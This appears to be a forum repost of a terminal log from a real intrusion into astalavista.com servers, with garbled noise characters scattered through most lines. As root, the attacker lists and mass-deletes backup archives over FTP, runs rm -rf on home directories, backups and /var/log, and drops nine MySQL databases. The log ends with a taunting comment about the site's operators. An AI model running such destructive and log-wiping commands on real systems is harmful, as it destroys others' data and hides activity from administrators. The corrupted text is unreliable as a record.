$ c8 L: S- a" q/ U7 T250 CWD command successful.4 c0 p7 O* c5 a' `# k
ftp> ls -la
, X2 I2 n7 ~( Y I4 L" r( ~227 Entering Passive Mode (212,254,194,163,2,189)
/ V( k' e' k) `, T7 w9 |150 Opening BINARY mode data connection for ‘file list’.
" M. Y5 l4 o" J3 N-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
. B2 t1 p) F" n! W1 A* z-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz26 E7 J5 D' \1 E4 g
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
! @/ f; e9 n; X$ t. R) U, ?/ H8 N# F-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar/ o$ @% O: R0 }0 C8 I/ s( R
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar% C9 i5 h" V3 e6 q0 n; l: S$ N# p s
[snip]
' e9 q, M2 k5 c* f6 b3 m$ _! c226 Transfer complete.
, T- ] |0 q! \& Z" q# p, ^' fftp> mdelete *5 N, P: I: x" i) H+ d
ftp> ls -la9 R( G- W( {7 i( L1 F+ p
227 Entering Passive Mode (212,254,194,163,2,193)1 z4 w6 z4 W: r. v X- R
150 Opening BINARY mode data connection for ‘file list’.
9 S% s' F. @, S( {+ m' X226 Transfer complete.
1 A7 w& v$ ]. Dftp>% H( E) M/ `" d
- p( d. N9 j! x! a$ J2 y E# {
sh-3.2# cd /home
% v0 j6 U8 L# {+ i3 l6 A4 o+ y5 Zsh-3.2# ls -la
7 Y/ A9 C/ Y: |5 p) Ttotal 120' [1 O' V4 x* |; B4 q) A* e+ w
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .# Y1 y+ F- b4 o! w$ G, J+ s* f
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .." V* ]; e L: G( D* C
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
# I! o% D5 ?* B% z3 z$ e0 C-rw——- 1 root root 8192 Jun 4 03:03 aquota.group+ ~6 w2 ~( D: p5 |/ L
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user0 C4 T; U8 s4 Z# s
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet- e$ d7 W9 A# x
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
4 @2 F8 y5 W& ^ O& S3 ndrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161, V, D3 q; T+ \1 p" R
drwx–x–x 10 com com 4096 Apr 28 12:40 com5 {) r% q# J2 x8 H$ O3 U! Q: ]- ~
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
: R/ g, B8 b* B {8 N7 e" b n, qdrwx—— 3 jon jon 4096 Sep 21 2007 jon0 G* F- m! B& n: \
drwx—— 2 root root 16384 Sep 11 2007 lost+found0 `( `. {* M( m: ?0 l9 m; v
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
" M9 V6 L$ x. F% ndrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
) @( {( L# n* O. pdrwx—— 2 jon jon 4096 Sep 15 2007 test
( M9 ]/ w ?& v1 z' _drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp& h9 t' _# N ?
3 M$ U" g: i; c3 Y% s' v3 R) msh-3.2# rm -rf backup/
% m4 ]. J. E* O* \sh-3.2# rm -rf backup.14161/! a7 | m/ d2 u% T. f
sh-3.2# rm -rf ftp/
" B( ]/ ~% c! o5 h6 ^: H& Y6 Fsh-3.2# rm -rf jon/- q% D' M+ n: D& V0 d
sh-3.2# rm -rf my/% c9 ?% b+ }9 B7 _
sh-3.2# rm -rf mysqldata/' }9 I) a, Z3 F* ]# X; \
sh-3.2# rm -rf test/2 z; ~( {, W4 j' J* b; G/ s
sh-3.2# rm -rf tmp/! l( H6 }2 R0 Z+ s8 E
sh-3.2# cd ~8 H4 P, ?! s+ Y
sh-3.2# rm -rf *
( D4 A, u1 V0 n! ]% X) v* [2 {; Csh-3.2# rm -rf /var/log/1 ]8 k6 ~0 N, P5 @6 W
rm: cannot remove directory `/var/log//proftpd’: Directory not empty# ^/ i) h4 T* j. H* z8 a$ `8 Z
sh-3.2# rm -rf /home/*
# i* `$ r0 e! C7 Msh-3.2# mysql
2 J2 R; |3 R, A, j8 dWelcome to the MySQL monitor. Commands end with ; or \g.
0 b4 n& a4 Y* d3 Q/ W3 r7 ]$ ]Your MySQL connection id is 407156 h2 d& U8 N: F ~+ j
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
1 W7 M* p2 J2 _3 d9 Q' x' b9 F X$ o* e2 Z3 [; S- v0 `
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
1 {2 F1 E3 W4 J" }, g
% Y8 @ D/ H5 o$ Omysql> show databases;; E3 w2 x& F' e3 s+ O
+———————–+
6 w/ t5 \5 T+ ^9 G5 v| Database |
6 R2 D# e; a- ^- S3 N' N- f+ C9 d; V: q+———————–+
# ] C3 A3 W2 q, B. A/ m| information_schema |$ I/ `/ I0 V! {, I6 n
| astanet_ads |
$ U0 o5 L' D* A2 k( n( F* G| astanet_mailing_lists |4 {, J8 S7 f Z0 x( Z! @, [
| astanet_mediawiki |6 S+ s1 B9 d5 k
| astanet_membersystem |
; A, X& }3 q K| com_contrexx |
, {0 r/ r% [2 D8 j3 B% B" z| com_contrexx2 |
- I) v: ]4 U1 D, ?/ A4 d. @2 m| com_contrexx2_live | e- O6 I$ t) K5 v- Q
| da_roundcube |8 h7 C' T/ t! ]1 P" m0 j
| dolphin |! ?# t; L2 s4 F
| ideapool |; ]( X/ X% s* M
| mysql |
& G+ ^) _9 r; [# e| test |
/ W0 [; D* C! o| yourmaster |' |1 R, `; E- p2 f- K7 P i& K4 m
+———————–+ K2 c! X1 z4 `: H: ^- S
14 rows in set (0.03 sec)
# U0 x& y( e6 p, w. R: g0 y* @1 l& @1 w _( c% @) s
mysql> drop database astanet_membersystem;* P) z9 Q {5 m3 x
droQuery OK, 46 rows affected (0.81 sec)& y. `* E+ H( o2 A: _5 I: j- m
/ g% }' |2 Q: k @2 \2 i" pmysql> drop database com_contrexx;) I" H7 a9 O, X; i
Query OK, 211 rows affected (2.72 sec) x* |: C: X8 S% F
* c2 T) j9 c9 l, R6 Y) o3 T
mysql> drop database com_contrexx2;
$ }, c! v' t$ b# p% G/ @7 Z/ kQuery OK, 237 rows affected (2.23 sec)
/ h8 G& H+ I; g* Q& B" I
3 v' d1 j- I6 l% ?! V Z9 ~mysql> drop database com_contrexx2_live;( m$ g Y7 r6 t# Q
Query OK, 227 rows affected (7.63 sec)! N2 f" J6 `. U; a* u
: R/ n3 X0 a J) c% v0 Zmysql> drop database ideapool;2 i9 ]& o, `8 d/ S M+ j
Query OK, 69 rows affected (0.19 sec) @& M+ I. ^9 ]% M2 p. j2 g
2 Y* ]$ i) v( [4 {7 x* ]' X. U8 nmysql> drop database yourmaster;
2 l0 y+ \/ m* W% {& ^Query OK, 158 rows affected (0.55 sec)
# \2 v0 J# t \; }* a
. ]) q# p- N) F" K/ Mmysql> drop database astanet_ads;- |" x5 B4 h1 X
Query OK, 9 rows affected (0.11 sec)
7 p* z9 P9 T6 ~% F5 f. ^( G
: [8 T+ H, u7 D5 a; m( O; Cmysql> drop database astanet_mailing_lists;
# o2 h3 X3 N, t" Y3 c, g7 |Query OK, 24 rows affected (1.47 sec): I: `$ s2 x/ v. k2 \
3 S& y. Y9 s+ H" F6 fmysql> drop database astanet_mediawiki;
/ K8 r& |+ O( i# IQuery OK, 31 rows affected (0.51 sec)
8 a/ e b/ L. A
9 R, _: Z, U8 d) Lmysql> show databases;; ]% W/ T4 \) O# ?0 n
+——————–+
7 V1 R8 z6 H4 P- u3 V! S2 a| Database |
( _& O( H$ `6 E+——————–+* Y; u* \* g4 R, i
| information_schema |- _: `$ r6 G3 d1 H! y$ J
| da_roundcube |2 O& ?# {4 @5 G: v
| dolphin |
5 ?# p, A/ ]6 A| mysql |
3 s7 s: g y1 `: S2 ~0 @* T& H8 c| test |8 M; T. Q8 } K
+——————–+
7 z4 t7 J, y& f: N3 i# `5 rows in set (0.00 sec)
2 a7 ^# B) v! r V# ?% L1 }0 a+ u: a
What a journey! We’re not sure exactly why the “Terminator” had any influence on
, D1 V/ M0 O7 g- }, i, qtheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the
$ d' N% W, W) l( F# N9 I! kwrong to say this pack of morons *wont be back*.: t# ^7 `$ ^4 I/ W: K- L* b
|
发表于 2012-11-6 21:07:34
收藏
支持
反对